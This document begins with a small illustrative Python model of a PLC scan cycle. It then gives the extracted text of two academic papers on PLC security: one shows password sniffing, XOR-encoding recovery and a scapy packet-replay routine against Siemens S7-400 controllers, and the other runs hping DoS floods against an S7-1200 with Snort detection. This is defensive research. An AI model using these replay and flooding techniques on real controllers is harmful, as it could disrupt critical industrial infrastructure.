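# sketched in Figure 7 (illustrative only; boolean instructions without
# timers, counters or the natural-number encoding used in the Coq work).

from dataclasses import dataclass, field

@dataclass
class Conf:
    cycle: int = 0
    cr: bool = False          # current result register (s.1 in the Coq state)
    vars: dict = field(default_factory=dict)
    loc: int = 0              # index of the next instruction
    mode: str = "I"           # "I" = input, "E" = execution, "O" = output

def eval_instr(op, arg, conf):
    """Update the current result / variable store for one instruction."""
    v = conf.vars.get(arg, False)
    if op == "LD":     conf.cr = v
    elif op == "LDN":  conf.cr = not v
    elif op == "AND":  conf.cr = conf.cr and v
    elif op == "ANDN": conf.cr = conf.cr and not v
    elif op == "OR":   conf.cr = conf.cr or v
    elif op == "ORN":  conf.cr = conf.cr or not v
    elif op == "ST":   conf.vars[arg] = conf.cr

def instr_succ(op, arg, conf):
    """Successor location, mirroring instr_succ: jumps depend on the register."""
    if op == "JMP":   return arg
    if op == "JMPC":  return arg if conf.cr else conf.loc + 1
    if op == "JMPCN": return arg if not conf.cr else conf.loc + 1
    return conf.loc + 1

def transition(conf, program, inputs):
    """One step of the I -> E -> ... -> E -> O scan-cycle semantics."""
    if conf.mode == "I":            # input: latch fresh input values, then execute
        conf.vars.update(inputs)
        conf.mode = "E"
    elif conf.mode == "O":          # output: start the next cycle
        conf.cycle += 1
        conf.mode = "I"
    else:                           # execution: run the instruction at `loc`
        op, arg = program[conf.loc] if conf.loc < len(program) else ("RET", None)
        if op == "RET":
            conf.loc, conf.mode = 0, "O"
        else:
            eval_instr(op, arg, conf)
            conf.loc = instr_succ(op, arg, conf)
    return conf

# A latch in the spirit of the barrier program: Q0 := (I0 OR Q0) AND NOT Q1.
P = [("LD", "I0"), ("OR", "Q0"), ("ANDN", "Q1"), ("ST", "Q0"), ("RET", None)]

c = Conf(vars={"Q0": False, "Q1": False})
while not (c.cycle == 1 and c.mode == "I"):      # run exactly one full cycle
    c = transition(c, P, {"I0": True, "I1": False, "I2": True})
print(c.vars["Q0"])   # True: the output latches once the coin input is seen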
PLC_access_control_a_security_analysis.pdf
A Programmable Logic Controller (PLC) is a very common industrial control system device used to control output devices based on data received (and processed) from input devices. Given the central role that PLCs play in deployed industrial control systems, they have been a preferred target of ICS attackers. A quick search in the ICS-CERT repository reveals that, out of a total of 589 advisories, more than 80 target PLCs. The Stuxnet attack, considered the most famous reported incident on ICS, mainly targeted PLCs. Most reported PLC incidents are rooted in the PLC being accessed in an unauthorized way. In this paper, we investigate the PLC access control problem. We discuss several access control models, but we focus mainly on the commonly adopted password-based access control. We show how such a password-based mechanism can be compromised in a realistic scenario, and we list the attacks that can be derived as a consequence. This paper details a set of vulnerabilities targeting recent versions of PLCs (2016) which have not been reported in the literature.
PLC Access Control: A Security Analysis Haroon Wardak Information and Computer Science Department KFUPM, Dhahran, 31261, KSA Email: [email protected] Zhioua Information and Computer Science Department KFUPM, Dhahran, 31261, KSA Email: [email protected] Almulhem Computer Engineering Department KFUPM, Dhahran, 31261, KSA Email: [email protected] Keywords-PLC; SCADA; Industrial Control Systems; Access Control; Passwords; I. I NTRODUCTION A Programmable Logic Controller (PLC) is an important component in an ICS system. It is a control device used to automate industrial processes via collecting input data from eld devices such as sensors, processing it, then send commands to actuators devices such as motors. Being a pivotal device in ICS systems, PLCs are preferred target for cyber security attacks. ICS-CERT, the repository for ICS speci c incidents, includes a large number of PLC related issues. A quick search performed in November 2016 reveals that out of a total of 589 advisories, 89 target directly PLCs and out of a total of 114 alerts, 17 involve PLCs. Another manifestation of the exposure of PLCs to cyber security attacks is the Stuxnet malware [1] which is designed to attack primarly PLCs of the Iranian nuclear facility. PLC security issues range from simple DoS to sophisti- cated remote code execution vulnerabilities. Most of PLC attacks are possible because attackers could have access and compromise the PLC device. PLC Access Control can be implemented at different layers: network layer, physical access, rmware, etc. In this paper, we discuss the different access control models for PLCs, but we focus on the most commonly deployed access control mechanism, namely,password-based access control. Using recent PLC devices (2016) with updated rmware, we show how passwords are stored in PLC memory, how passwords can be intercepted in the network, how they can be cracked, etc. As a conse- quence of these vulnerabilities, we could carry out advanced attacks on ICS system setup, such as replay, PLC memory corruption, etc. II. PLC V ULNERABILITIES A PLC is a particular type of embedded devices that is programmed to manage and control physical components (motors, valves, sensors, etc.) based on system inputs and requirements. A PLC typically has three main components, namely, an embedded operating system, control system soft- ware, and analog and digital inputs/outputs. Hence, a PLC can be considered as a special digital computer executing speci c instructions that collect data from input devices (e.g. sensors), sending commands to output devices (e.g. valves), and transmitting data to a central operations center. PLCs are commonly found in supervisory control and data acquisition (SCADA) systems as eld devices. Because they contain a programmable memory, PLCs allows a cus- tomizable control of physical components through a user- programmable interface. The ICS-CERT repository, dedicated to ICS related se- curity incidents, includes several reports involving PLC vulnerabilities and alerts. Most of the reports are relatively recent (2010 and later). The increase in ICS and PLC incidents coincides with the increasing interconnection of ICS and corporate networks which became a necessity to improve ef ciency, minimize costs, and maximize pro ts. This, however, exposes ICS systems, and PLCs in particular, to various types of exploitation. Most of PLC vulnerabilities can be grouped into three categories, namely, network vulnerabilities, rmware vulner- abilities, and access control vulnerabilities. 
PLCs are increasingly required to be interconnected with corporate LANs, Intranets, and Internet. Due to their increas- ing connectivity, PLCs are expected to support mainstream network protocols. Such standard protocols (e.g. TCP, IP, ARP, etc.) facilitate interconnection, but bring their own vul- nerabilities (e.g. Spoo ng, Replay, MITM, etc.). However, World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 56 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Table I EXAMPLES OF PLC NETWORK VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES Advisory Affected product Vulnerability Exploit ICSA-11-223-01A Siemens SIMATIC PLCs Use of Open Communication Protocol Execute unauthorized commands ICSA-15-246-02 Shneider Modicon PLC Web Server Remote le inclusion Remote le execution ICSA-12-283-01 Siemens S7-1200 Web Application Cross-site Scripting Run malicious javascript on Engineer- ing station browser ICSA-15-274-01 Omron PLCs Clear text transmission of sensitive informationPassword snif ng ICS-ALERT-15-224-02 Schneider Electric Modicon M340 PLC StationLocal le inclusion Directory traversal/ le manipulation the most common type of network vulnerabilities is related to ICS speci c network protocols such as Modbus, pro net, DNP3, etc. which include lack of authentication, lack of integrity checking of data sent over the protocol. Table I lists a sample set of PLC network vulnerabilities as reported in ICS-CERT repository. Firmware is the operating system of controller devices, in particular, PLCs. It consists in data and code bundled together with several features such as OS kernel and le system. As any software, a rmware is prone to aws and security vulnerabilities. Vulnerabilities include buffer over ow, improper input validation, awed protocol imple- mentation, etc. More importantly, rmware and patches must be certi ed by vendors to make sure that they will not break system functionalities. Unfortunately, a large number of PLC vendors use weak rmware update validation mechanisms allowing unauthenticated rmware updates [2]. Table II lists a sample set of PLC rmware vulnerabilities as reported in ICS-CERT repository. A PLC is a sensitive component of ICS systems and hence only authorized entities should be allowed to access it and any such access should be appropriately authenticated. The most common PLC access control vulnerabilities include poor authentication mechanism, lack of integrity methods, awed password protection, and awed communication pro- tocols. For example, PLC vendors use hidden or hard coded usernames and passwords to fully control the device. Attack- ers setup a database of default usernames and passwords and can brute-force such devices. Once unauthorized access is performed, an adversary can retrieve sensitive data, modify values, manipulate memory, gain privilege, change PLC logic, etc. III. PLC A CCESS CONTROL A. Physical access control Proper deployment and access control of PLC as well as other ICS controllers mitigate signi cantly security breaches either from internal or external adversaries. Access control vulnerabilities can be signi cantly reduced by implement- ing recommendations in established standards such as the ANSI/ISA-99 [3]. It is a complete security life-cycle pro- gram that de ne procedures for developing and deployingpolicy and technology solutions to implement secure ICS systems. 
ISA99 is based on two main concepts, namely, zones and conduits, whose goal is to separate various subsystems and components. Devices that share common security requirements have to be in the same logical or physical group and the communication between them take place through conduits. This way, network traf c con den- tiality and integrity is protected, DoS attacks are prevented and malware traf c is ltered. In addition, control system administration must restrict physical and logical access to ICS devices to only those authorized individuals expected to be in direct contact with system equipments. B. Network access control ICS network access control is typically implemented in layers. The rst layer is network logical segmentation achieved typically with security technologies such as re- walls and VPNs. All controller devices, in particular PLCs, must be located behind rewalls and not connected directly to corporate or other networks. Most importantly, critical devices should not be exposed directly to Internet. Remote access to all ICS devices should be through secure tunnels such as VPNs. It is important to note that rewall and VPN technologies used in ICS systems are different from main- stream rewall and VPN used in typical IT networks. Indeed, many vendors many vendors provide special appliances for securing ICS networks. For example, Siemens provides a special type of switch, namely, Scalance S, with rewall and VPN features to secure the communication from/to PLCs. Finally, even with full deployment, these technologies may not block all breaches due to weak or inadequate con gurations and ltering rules. C. Password access control Password based access control is by far the most com- monly used type of access control. Most PLC devices have built-in password protection to prevent unauthorized access and tampering. For effective password access control, important requirements need to be satis ed. In particular, password protection: must be enabled whenever possible must be properly con gured World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 57 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Table II EXAMPLES OF PLC FIRMWARE VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES Advisory Affected product Vulnerability Exploit ICSA-16-026-02 Rockwell MicroLogix 1100 PLC Stack-based buffer over ow Remote execution of arbitrary code ICSA-13-116-01 Galil RIO-47100 PLC Improper input validation (allowing repeated requests to be sent in a single session)Denial of Service ICSA-14-086-01 Shneider Modbus Serial Driver Stack-based buffer over ow Arbitrary code execution with user privilege ICSA-12-271-02 Optimalog Optima PLC Improper handling of incomplete packets Denial of Service ICSA-16-152-01 Moxa UC 7408-LX-Plus Device Non-recoverable rmware overwrite Permanently harming the device Figure 1. PLC Lab Setup must use strong encoding scheme must not need high processing operations must not use hardcoded credentials must be frequently and periodically changed. In addition, it is highly recommended to delete default accounts or change default passwords. Unfortunately, not all vendors comply with and enforce these principles, therefore several password related incidents are reported. IV. 
S ECURITY ANALYSIS OF PLC PASSWORD ACCESS CONTROL To carry out a realistic security analysis of PLC access control, we selected a commonly used PLC model, namely, Siemens S7-400, and setup a lab including common ICS con guration (Fig. 1). Based on S7-400 documentation, several test cases have been performed which revealed three access control levels for the PLC, namely, no protection, write-protection and read/write-protection. The rst level of access control, which is the default level, does not provide any form of access control. Using this level, any entity (device, station, etc.) can access the PLC processes and data without restriction. Access is possible provided that the remote entity speaks a PLC supported communication protocol (e.g. COTP, Mod- bus, Pro net). The second level, write-protection, provides as its name indicates a write protection on PLC data and processes. That is, any attempt to modify data or processes on the PLC (e.g. Load new program, clear data) is password authenticated. The third level, which is the most restrictive, is read/write-protection. Using that level, any interaction, that is, read from or write to the PLC is password authenti- cated. A. Password policy The con guration software, namely, SIMATIC PCS7 ac- cepts any 8 ASCII characters password. If the password is less than 8 characters long, PCS7 pads it with white spaces. To set a PLC password, a user has to change the protection level and set the password in the PCS7 hardware con guration tool before loading the changes to the PLC. In addition to being loaded to the PLC memory, the password is stored locally in the engineering station s local les. In a normal scenario any command sent to the PLC (e.g. start, stop, clear memory) should be authorized by providing the password. However, since the password is stored locally in the engineering station, PCS7 software will ask for the password only one time after the new con guration is loaded to the PLC. In subsequent interactions, PCS7 will include automatically the password in the packet requests sent to the PLC. B. PLC memory structure As mentioned above, setting a password consists in chang- ing the protection level, selecting a password and then loading the new con guration to the PLC memory. The latter is organized into labeled blocks. Each block holds a speci c type of information (Fig. 2). Most of PLC blocks are used to organized the PLC program into independent sections corresponding to individual tasks. Function Block (FB) is a block that holds user-de ned functions with memory to store associated data. Functions (FC) is used to keep frequently used routines in the PLC operations. Data Block (DB) stores user data. Organization Block (OB) is an interface between operating system and user program, used to determine the CPU behavior, for example, de ne error handling. System World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 58 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Function Block (SFB) and System Functions (SFC) hold low level functions (libraries) that can be called by user programs such as handling the clock and run-time meters. Therefore, information loaded to the PLC is divided into blocks as well. The password is communicated and stored in the System Data Block (SDB). SDB itself is divided into sub-blocks with different roles. 
The sub-blocks numbered from 0000 to 0999 and from 2000 to 2002 hold data that is updated in each download process. The rest of the sub- blocks are divided into two sets: sub-blocks from 1000 to 1005 should contain data and sub-blocks from 1006 to 1011 should contain con guration data. Loading a new program to the PLC yields to ovewriting all sub-blocks of the SDB block, except the 0000 sub-block which contains the password. If an adversary aims at updating the password, he needs to clear the 0000 block rst with a dedicated command and then set a new password with another command. OB FB FC DB SDB SFC SFB Other Data0000 0001 0093 00220003 0007 0004 0002 0026 0092 0091 0090 0122 0126 0999 2001 2002 1006 1007 1008 1009 1010 10111000 1001 1002 1004 10052000 1003System Data BlocksPLC memory block types Figure 2. S7-400 PLC memory structure C. PLC password snif ng In order to evaluate the security of the password-based access control, a rst step is to sniff the network packets containing the password. Typical network snif ng software is used to capture packets exchanged between the engi- neering station (PCS7) and the PLC during a password setting process (e.g. Wireshark, tcpdump). Since password setting is achieved through load con guration command sent to the PLC, the process is repeated several times with different passwords to collect a good number of samples. The captured traf c is rst ltered to extract complete TCP streams. The streams are then compared using byte compar- ison tools (e.g. Burp Suite Comparator). These tools help nding similarities and differences between TCP streams. This allowed to identify the speci c packets containing the password and the exact bytes shift for the passwordlocation inside the packets. It turned out that the 8 characters password is encoded in each packet. Hence con guration software in the engineering station uses an encoding scheme to encode the password before uploading it to the PLC. It is important to note that when the PLC is con g- ured with no-protection level, sniffed packets during load con guration have the same size as with the other levels of protection (read protection and read/write protection). Hence, packets are padded with random bits in place of the password in case of no-protection level. D. Reverse engineering password encoding scheme After locating the 8 bytes inside the network packets con- taining the password, the next step is to decode the bytes to retrieve the plain-text version of the password. The reverse- engineering started by trying typical encoding schemes, namely, URL encoding, ASCII Hex, Base64, variants of Xor (single-byte, multiple-byte, rolling, etc.). However, none of these typical schemes retrieved the plain text version of the password, pre-set in our samples. Full- edged cryptographic (DES, AES, RC4, etc.) as well as hashing (MD5, SHA512, etc.) functions are excluded in the investigation because of three reasons. First, there is no key exchange stage involved before password communication1. Second, if cryptographic and hashing functions were used, the encoded password bytes would be completely shuf ed compared to the plain text version, which is not the case here (the cipher text is encoded byte by byte). Third, cryptographic and hashing functions are too processing intensive for PLCs. Figure 3. PLC Password Encoding Xor is a very common encoding scheme that is suitable for resource limited hardware devices. As mentioned above, 1This holds for cryptographic functions. 
World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 59 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. the password encoding is not using typical Xor (single- byte, multiple-byte, etc.). Taking into consideration the fact that the encoding is done byte-by-byte and the requirement of a lightweight encoding algorithm, we focused on trying customized Xor transformations. To this end, a represen- tative list of (plain-text password, encoded-text password) pairs have been sampled from the network. Then, using automated scripts to brute-force each byte, we could suc- cessfully reverse-engineer the Xor based encoding scheme. A graphical representation of the nested Xor based encoding scheme is shown in Fig. 3. It is important to note that the PLC is using two variants of the encoding scheme: one used to load a con guration to the PLC and the other is used during the authentication process. Both variants differ by the staic byte constant used: 0x55 and 0xAA . V. PLC A CCESS CONTROL ATTACKS As a consequence of compromising the password based PLC access control, several concrete attacks can be carried out on the PLC ranging from simple replay to unauthorized password update attacks. A. Replay attack A replay attack on the PLC consists in recording a sequence of packets related to a certain legitimate command and then replaying it later without authorization. The attack consists of 3 steps: starting a given command (stop, start, load con guration, clear memory block, etc.), capturing the packets, and replaying the captured packets at a later time. The target PLC may or may not be password protected. are accepted by the TCP/IP kernel at the PLC, We resorted to write a customized python script using scapy [4]. Scapy is a powerful packet manipulation program written in python and hence can be easily used in python scripts. It features a variety of packet manipulation capabilities including: sniff- ing and replaying packets in the network, network scanning, tracerouting, etc. However, the most useful scapy features for our replay attack are the ability to rewrite the sequence and acknowledgement numbers and to match requests and replies. Algorithm 1 shows the core of the python script using the scapy features. The above python program has been tested using two attack scenarios. In the rst scenario, the replay attack was launched from the same host (IP address) used for the capture, that is, the engineering station with the con gura- tion software. In the second scenario, the replay attack was launched from a different host on the same network, that is, the attacker machine with Kali. In each scenario, two types of commands are tried, namely, start and stop which require password authentication. The replay attack was successful in both scenarios for both types of commands. Hence, an unknown attacker machine (without appropriate con gu- ration software) on the same network, can turn the PLC ON or OFF by simply replaying a start or stop commandAlgorithm 1 Replay a sequence of captured packets using Scapy 1:function REPLAY (pcap le, eth interface, srcIP, srcPort) 2: recvSeqNum 0 3: SYN True 4: forpacket in rdpcap(pcap le) do 5: ip packet[IP] 6: tcp packet[TCP] 7: del ip.chksum .Clearing the checksums 8: ip.src srcIP .Attacker s machine IP 9: ip.sport srcPort .Attacker s machine Port 10: iftcp. ags == ACK or tcp. 
ags == RSTACK then 11: tcp.ack recvSeqNum+1 12: ifSYN or tcp. ags == RSTACK then 13: sendp(packet, iface=eth interface) 14: SYN False 15: continue 16: end if 17: end if 18: rcv srp1(packet, iface=eth interface) 19: recvSeqNum rcv[TCP].seq 20: end for 21:end function without knowing the PLC password. This clearly might cause signi cant damage to a SCADA system. 1) Password stealing: As detailed Section IV, packets between the engineering station and the PLC are sent in clear including the encoded passwords. Based on a representative set of samples, we could locate the password inside packets and reverse-engineer the password encoding scheme. This allowed us to retrieve the plain-text password from the network traf c between the engineering station and the PLC. 2) Unauthorized password setting and updating: In a legitimate scenario, the PLC password is set and updated from the con guration software in the engineering station. In case of password update, the old password should be supplied rst. Due to the PLC access control vulnerability, an attacker can set and update the password by replaying malicious packets directly to the PLC. When a password is written on the PLC, the SDB (System Data Block) is overwritten. The load process rst checks the SDB to see if it s clean or has a con guration already. If there is a con guration, the process checks if a password is set or not. Hence, there are two main cases: setting a con guration with a password for the rst time and updating an old con guration that has already a password. For the rst case, setting a password for the rst time requires to record a password setting packets sequence used in an old session and then replaying them. Since the goal is mainly to set the password, only packets in charge of overwriting block 0000 in the SDB, which contain the password, are kept (More details in Section IV-B). For the second case, the goal of the attack is to set a password while the PLC is already protected by an existing password. Using the same procedure as the rst case as-is did not work. After investigation it turned out that the block 0000 of the SDB holding the password cannot be overwritten by replaying packets. As a result, the PLC keeps sending a World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 60 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. FIN packet whenever an attempt is made to overwrite the SDB. To overcome this problem, we resorted to a two-stage procedure where initially we clear the content of 0000 block and then we replayed packets to overwrite only that block with a new password. Since there is no legal command to just clean 0000 block, we looked for a sequence of packets to delete a different block and we modi ed them to delete 0000 block. With this two-stage procedure, the password is successfully updated by a different workstation without the con guration software and without knowing the old password. 3) Clear PLC memory: The rst stage of the unautho- rized password updating attack consists in clearing the 0000 block of the SDB without a need for the password. This step can be generalized to clear other blocks. More importantly, in an extreme use case, all PLC memory blocks can be cleared. With this vulnerability, an attacker can launch a DoS attack by clearning all PLC memory and turning the PLC into unresponsive device. VI. 
R ELATED WORK Very close to our work, in a BlackHat talk, Beresford demonstrated a number of vulnerabilities in Siemens Simatic PCS7 software including replay attacks, authentication by- pass, ngerprinting and remote exploitation using Metasploit framework [5]. This paper deviates from Beresford s demon- strations since our attacks are more interactive and use the recent and more secure versions of the PCS7 software as well as the more uptodate rmware of Siemens PLC S7- 400. As a generalization of Beresford s attacks, Milinkovic and Lazic reviewed a set of commercial Operating Systems running on PLCs of major vendors, highlighting serious vul- nerabilities with some experiments of few attacks conducted on ControlLogix PLC [6]. Also close to our work, Sandaruwan et al. showed how to attack Siemens S7 PLCs by exploiting aws in the ISO- TSAP (Transport Service Access Point) protocol used for data exchange between controllers and PLCs [7]. A signi cant body of work in the literature focuses on security solutions for ICS systems which yield several coun- termeasures to reinforce the security of such systems. These can be classi ed into communication protocols improve- ment [8], [9], and rewalls, ltering methods, DMZs [10], [6], [7]. However, unlike typical IT systems, it is impractical and cost-effective to embrace several layers of mitigations due to performance and availability considerations. VII. C ONCLUSION PLCs are preferred target for cyber security attacks. PLC security issues range from simple DoS to sophisti- cated remote code execution vulnerabilities. Most of PLC attacks are possible because attackers could have access and compromise the PLC device. In this paper, we carried out a security analysis of the most common PLC accesscontrol mechanism, namely, password-based access control. Using recent PLC devices (2016) with updated rmware, we showed how passwords are stored in PLC memory, how passwords can be intercepted in the network, how they can be cracked, etc. As a consequence of these vulnerabilities, we could carry out advanced attacks on ICS system setup, such as replay, PLC memory corruption, etc. Although mitigating such vulnerabilities is relatively easy by placing a security module (e.g. Scalance S) between the PLC and other devices, such approach is not yet widely deployed for budget and practical considerations. ACKNOWLEDGMENT This research was supported by The National Science, Technology and Innovation Plan (NSTIP) grant, NSTIP 13-INF281-04 at King Fahd University of Petroleum and Minerals. REFERENCES [1] N. Falliere, L. O. Murchu, and E. Chien, w32.stuxnet dossier , White paper, Symantec Corp., Security Response, 2011. [2] A. Costin, J. Zaddach, A. Francillon, and D. Balzarotti, A large-scale analysis of the security of embedded rmwares, 23rd USENIX Security Symposium (USENIX Security 14), pp. 95 110, 2014. [3] E. Byres, Revealing network threats, fears: How to use ansi/isa-99 standards to improve control system security, 2011. [4] P. Biondi, Scapy, see http://www. secdev. org/projects/scapy, accessed on 2016-09-20. [5] D. Beresford, Exploiting siemens simatic s7 plcs, Black Hat USA, 2011. [6] S. A. Milinkovi c and L. R. Lazi c, Industrial plc security issues, Telecommunications Forum (TELFOR), pp. 1536 1539, 2012. [7] G. Sandaruwan, P. Ranaweera, and V . A. Oleshchuk, Plc security and critical infrastructure protection, 2013 IEEE 8th International Conference on Industrial and Information Systems, pp. 81 85, 2013. [8] M. Majdalawieh, F. Parisi-Presicce, and D. 
Wijesekera, DNPSec: Distributed Network Protocol version 3 (DNP3) security framework, in Advances in Computer, Information, and Systems Sciences, and Engineering. Springer, 2007, pp. 227-234. [9] J. Heo, C. S. Hong, S. H. Ju, Y. H. Lim, B. S. Lee, and D. H. Hyun, A security mechanism for automation control in PLC-based networks, 2007 IEEE International Symposium on Power Line Communications and Its Applications, pp. 466-470, 2007. [10] R. E. Johnson, Survey of SCADA security challenges and potential attack vectors, Internet Technology and Secured Transactions (ICITST), 2010 International Conference for, pp. 1-5, 2010.
Cyber_security_in_industrial_control_systems_Analysis_of_DoS_attacks_against_PLCs_and_the_insider_effect.pdf
Industrial Control Systems (ICS) are vital for countries' smart grids and critical infrastructures. Alongside advantages such as controlling and monitoring geographically distributed structures and increasing productivity and efficiency, ICS have also introduced security problems that require specific solutions. The most important information security property for ICS is availability, and the most devastating threat to it is the Denial of Service (DoS) attack. For this reason, this paper analyzes DoS attacks carried out against Programmable Logic Controllers (PLC), an important component of ICS. Real PLC devices were used in the test environment where the attack scenarios were implemented, in order to obtain the most accurate results. The paper also emphasizes the destructive effect of insiders in cyber attacks against ICS, particularly in bypassing system security measures and in the discovery phase.
978-1-5386-4478-2/18/$31.00 2018 IEEE Cyber Security in Industrial Control Systems: Analysis of DoS Attacks against PLCs and the Insider Effect Ercan Nurcan Ylmaz, B nyamin Ciylan Gazi University, Faculty of Technology, Ankara, Turkey Serkan G nen Gazi University, Institute of Natural and Applied Sciences, Ankara Turkey Erhan Sindiren, G k e Karacay lmaz Gazi University, Institute of Informatics, Ankara, Turkey Index Terms -- Denial of service, indu strial control systems, insider attacks, PLC security, vulnerability analysis. I. INTRODUCTION Industrial Control Systems (ICS); are used in the management and maintenance of critical infrastructures, which are usually geographically distributed, such as gas, water, production, transportation and power distribution systems. Most of the ICS consist of several sub-components, such as Programmable Logic Controller (PLC), Human Machine Interface (HMI), Master Terminal Unit (MTU) and Remote Terminal Unit (RTU) [1]. However, in old generation ICS, private internal networks which were independent from the external networks were used for communication of these components. In order to control and monitor geographically distributed structure and to increase productivity and efficiency, Internet or intranet connection was required in ICS [2-4]. Along with this process, new vulnerabilities that could not be identified beforehand have emerged. These vulnerabilities are; Generally using open system source codes, Permitting remote access (VPN, etc.), Beyond security, ICS have a design that primarily focuses on the effectiveness of the system, such as critical timing needs, tight performance definitions, and task priorities, Not using security systems that should be used to protect ICS from other networks or from threats that may arise from the network because of commercial concerns, Not controlling privileged accounts of authorized IT staff, Not changing default usernames and passwords and therefore leaving backdoors, Using communication protocols developed for commercial purposes that security is not considered at all or rarely handled [5]. ICS are responsible for controlling and monitoring many critical infrastructures. For this reason, security vulnerabilities in systems under control, the entire infrastructure can become ICS cause these systems to become potential targets for attackers. If the attackers deactivate these systems, this may result not only in economic harm but also in the fact that citizens cannot receive important services in their lives [6]. Thus, it is crucial to analyze in depth to reveal existing vulnerabilities of components (PLC, HMI, RTU, MTU, etc.) and the protocols (ModBUS, Profinet, DNP3, etc.) used in ICS [7]. It will only be possible to take precautions against these vulnerabilities and prevent them from being exploited again by the attackers [8-10]. Vulnerabilities in ICS can cause intruders to infiltrate the network, gain access to control software, and lead to undesired major damages with changing the operating conditions of the system. DoS attacks are the types of attacks that can eventually be noticed by the vi ctims. However, it is important to detect these attacks as soon as possible, without hampering the use of services or creating a flood impact [11]. While DoS attacks seem often less dangerous than other attacks, they can become more dangerous in some cases for ICS and for critical infrastructures these systems manage. 
For example, in the event of preventing to close the gate of a dam in an urgent occasion or disabling the systems that control the temperature, such as in nuclear power plants, the denial of service attack can lead to major disasters. ICS are an integral component of the production and control process. The management of the majority of modern infrastructures is based on these systems. However, when they are evaluated in terms of cyber security, it is seen that the PLCs, which are important components of ICS, are in an open architecture to external networks and especially internet based constructions. Despite the security breaches in ICS, until recently, there has not been enough interest and study in the scientific area of the securi ty of PLC-managed automation systems. Only after the detection of Stuxnet malware in 2010, researches to identif y security vulnerabilities in PLC-based systems have begun to attract interest of PLC suppliers and users. Subsequent virus findings such as DuQu, Flame / sKyWIper, Night Dragon, Shamoon, Havex and Sandworm / Black Energy 2 also indicate the presence of an increasing tendency in critical infrastruc ture attacks. Despite these 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 81 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. events, security awareness of ICS environments is still not a top priority in many institutions [12]. Because the security objectives for ICS are based on accessibility, integrity and confidentiality, respectively [13,14]. In this context, the test environment (Testbed) was established to determine how to bypass the security precautions of the PLC, which is a significant component of ICS, by exploiting the security vulnerabilities of hybrid ICS protocols (Profinet-TCP/IP, etc.). In the test environment, the vulnerabilities of PLCs were evaluated through Denial of Service (DoS) attacks. Subsequently attacked packets were captured and analyzed in order to obtain the patterns of the attacks. Furthermore, the importance of managing privileged accounts for cyber attacks against ICS and the effects of insiders with these accounts were discussed. In this respect, it is aimed to rescue ICS from attacks with minimal damage and to prevent from similar attacks. Some of the studies on the security of ICS have focused on analysis based on simulation systems [14-17]. The weakest points of studies based on simulation systems are the difficulty of accurately projecting the real system and the possibility that the analyzes may not give the same results in the real system. Another part of the studies carri ed out within the scope of the security of ICS focus on confidentiality [18,19]. Solutions proposed above are usually based on cryptographic techniques. However, given the fact that today's ICS networks cover hundreds of installations with millions of equipment, the difficulty of implementing these solutions in practice can be better understood. II. T ESTBED In the majority of researches on the security of ICS, no implementation has been done to a real system. Thus, this study focuses on the detection of the vulnerabilities of the PLC device and TIA Portal app lication and the identification of the solution proposals by carrying out security analysis on a testbed where a real control system is involved. Figure 1. DoS attack reconnaissance, attack and detection steps for PLCs As shown in Fig. 
1, the analysis of the DoS attack carried out on PLC and TIA Portal applications consist of three phases. At first phase, attacks were carried out and the effects on the system were evaluated. The second phase is the observation phase, which is based on the analysis of captured packets as a result of attacks. In the last stage, it was aimed to create patterns related to attack via intrusion detection systems for detecting similar attacks. The testbed consisted of one S-7 1200 (2.2 firmware) PLC hardware, one management computer on which remote command and control of the PLC was performed with TIA Portal management software, and a personal computer with Kali Linux operating system for implementing attacks. A separate computer with SmoothSec installed was used to detect the attacks. DoS attacks were carried out on PLCs and TIA Portal application in the network topology shown in Fig. 2 by using Hping, SmootSec IDS and Wireshark tools. Figure 2. Testbed network topology III. DENIAL OF SERVICE ATTACK (DOS) One of the important threat to ICS is Denial of Service attack. The aim of Denial of Service attack is to block the system to access to authorized resources or preventing to use these resources in its intended manner [20,21]. Figure 3. DoS attack reconnaissance, attack and detection phases 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 82 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. In the analysis of the attack, Service Denial attack was carried out first, and the changes in the system were examined. Subsequently the rule sets crea ted by analyzing the captured attack packets according to the ph ases indicated in Fig. 3 were entered into the Snort based library. Detecting attacks, the ultimate goal, was achieved through these rules. PLC protocols responds to all query packets from any IP / MAC address or node points and this situation is also another important vulnerability in PLCs. It is determined that DoS attack can be carried out su ccessfully even if it is in a different network as long as the IP address of the target is detected, because DoS attack is a kind of directly IP-oriented attack. Any port scan tool like Nmap tool can be used for detecting the IP address of a PLC. In this respect, DoS attack was carried out to the PROFINET port (102) which is used mostly by PLC devices for network communication. Hping program was used for DoS attack and as long as the attack continued, the ping response time of the PLC device increased considerably. When the DoS attack was stopped, the ping response time measured as 1212 ms as shown in Fig. 4. Figure 4. DoS attack effects on PLC The DoS attack was also carried out to the TIA Portal, the control computer. As long as the attack continued, ping response time increased from about 2ms to 5280 ms. Additionally, all of the control buttons of the TIA Portal became inactive and the PLC could not be controlled via the TIA Portal as shown in Fig. 5. Figure 5. TIA Portal management screen after DoS attack DoS attack packets carried out on PLC were detected as medium severity spam as shown in Fig. 6. Figure 6. Event packets detected after DoS attack Despite the attack was carried out with a few attacker computers, it was detected that network became ineffective. 
